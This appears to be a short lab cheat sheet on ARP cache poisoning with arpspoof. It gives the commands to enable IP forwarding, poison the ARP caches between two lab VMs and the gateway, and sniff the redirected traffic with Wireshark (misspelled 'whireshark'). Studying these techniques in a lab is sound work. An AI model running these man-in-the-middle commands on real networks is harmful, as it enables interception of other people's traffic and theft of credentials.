Arpspoof Arp Cache Poisoning
Goal: tricking arp cache to redirect network traffic to us “Man in the middle”.
- VM1: 192.168.1.244
- VM2: 192.168.1.145
- GW: 192.168.1.1
Prerequisites
# Enable ip forwarding
sudo sh -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'
# Install arpspoof (part of dsniff)
sudo apt install dsniff
Listening to traffic between two VMs
# Checking arp table on VM1/VM2 allow to check IP/Mac
arp -a
# Start redirecting traffic from VM1 to VM2 to us
sudo arpspoof -i eth0 -t $VM1 $VM2
# Start redirecting traffic from VM2 to VM1 to us
sudo arpspoof -i eth0 -t $VM2 $VM1
# Checking arp table on VM1/VM2 allow to check IP/Mac
arp -a
# Using wireshark will allow to check/follow traffic
sudo whireshark
Pretending to be the default gateway
# Checking arp table allow to check IP/Mac
arp -a
# Start redirecting traffic from VM1 to VM2 to us
sudo arpspoof -i eth0 -t $VM1 $GW
# Start redirecting traffic from VM2 to VM1 to us
sudo arpspoof -i eth0 -t $GW $VM1
# Using wireshark will allow to check/follow traffic
sudo whireshark